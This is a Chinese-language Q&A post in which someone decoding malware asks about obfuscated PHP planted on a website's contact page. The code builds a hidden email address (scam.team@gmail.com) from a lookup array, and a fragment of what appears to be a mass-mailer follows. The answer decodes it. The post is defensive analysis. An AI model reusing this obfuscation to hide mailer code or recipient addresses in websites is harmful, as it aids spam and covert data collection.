Question

我正在解密一个恶意软件，此后，我在PHP代码中发现了一个数组块，我无法理解它的工作原理，对此需要我的专家意见。

$s=array("w"=>"e","t"=>"c","l"=>"a","r"=>"m","q"=>".","@"=>"t","e"=>"s","c"=>"@","v"=>"g","h"=>"i","y"=>"l","u"=>"o");
$dash=$s['e'].$s['t'].$s['l'].$s['r'].$s['q'].$s['@'].$s['w'].$s['l'].$s['r'].$s['c'].$s['v'].$s['r'].$s['l'].$s['h'].$s['y'].$s['q'].$s['t'].$s['u'].$s['r'];

总代码块为：

<?php
$s=array("w"=>"e","t"=>"c","l"=>"a","r"=>"m","q"=>".","@"=>"t","e"=>"s","c"=>"@","v"=>"g","h"=>"i","y"=>"l","u"=>"o");
$dash=$s['e'].$s['t'].$s['l'].$s['r'].$s['q'].$s['@'].$s['w'].$s['l'].$s['r'].$s['c'].$s['v'].$s['r'].$s['l'].$s['h'].$s['y'].$s['q'].$s['t'].$s['u'].$s['r'];
if ($action=="send"){
  if (!$from && !$subject && !$message && !$emaillist){
    print "Please complete all fields before sending your message.";
    exit;

这是附加在“ 与我们联系”页面上的代码块的一部分。

Answer 1

<?php

$s=array("w"=>"e","t"=>"c","l"=>"a","r"=>"m","q"=>".","@"=>"t","e"=>"s","c"=>"@","v"=>"g","h"=>"i","y"=>"l","u"=>"o");
$dash=$s['e'].$s['t'].$s['l'].$s['r'].$s['q'].$s['@'].$s['w'].$s['l'].$s['r'].$s['c'].$s['v'].$s['r'].$s['l'].$s['h'].$s['y'].$s['q'].$s['t'].$s['u'].$s['r'];


print_r($s);
print_r($dash);
?>

如果您尝试打印print_r($s);，则会打印

Array
(
    [w] => e
    [t] => c
    [l] => a
    [r] => m
    [q] => .
    [@] => t
    [e] => s
    [c] => @
    [v] => g
    [h] => i
    [y] => l
    [u] => o
)

和第print_r($dash);行将打印

scam.team@gmail.com

在$ dash变量处，它们正在访问与键关联的数据的值。

很难找出此代码块的含义？

1 个答案: